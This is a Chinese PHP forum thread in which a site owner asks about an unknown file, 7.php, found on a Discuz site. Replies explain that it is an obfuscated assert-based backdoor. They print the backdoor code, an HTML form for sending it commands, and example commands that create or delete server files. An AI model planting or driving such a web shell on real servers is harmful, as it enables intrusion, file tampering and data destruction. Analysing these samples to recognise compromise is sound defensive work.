首页 > 后端开发 > php教程 > discuz 里面有这段代码

discuz 里面有这段代码

WBOY
发布: 2016-06-23 13:32:32
原创
969 人浏览过

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

请问这是什么意思?
我的网站被主机屋封了,然后他们叫我删掉游戏登录器,我不太懂,就看了下FTP里面,
有这段代码,不会是黑客注入的吧?


回复讨论(解决方案)

有一个名为7.php的文件,我从来没见过的,然后里面有这段代码

是木马,利用assert来执行php函数的。

7.php

<?php                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
登录后复制
登录后复制


然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head>  <title> New Document </title> </head> <body>  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php">  <textarea name="-7" style="width:500px; height:300px"></textarea>    <input type="submit" value="submit"></form> </body></html>
登录后复制
登录后复制


然后运行shell.html,
1.在textarea中输入 phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入 file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入 unlink('xxxxx'); 后提交,就能删除xxx文件。

谢谢楼上的解答,我已经删了,就是想知道为什么

是木马,利用assert来执行php函数的。

7.php

<?php                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
登录后复制
登录后复制


然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head>  <title> New Document </title> </head> <body>  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php">  <textarea name="-7" style="width:500px; height:300px"></textarea>    <input type="submit" value="submit"></form> </body></html>
登录后复制
登录后复制


然后运行shell.html,
1.在textarea中输入 phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入 file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入 unlink('xxxxx'); 后提交,就能删除xxx文件。



大神我结贴了,顺便问一下有没有方法防范这种攻击?

都让人留后门了,还能防范吗?

来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板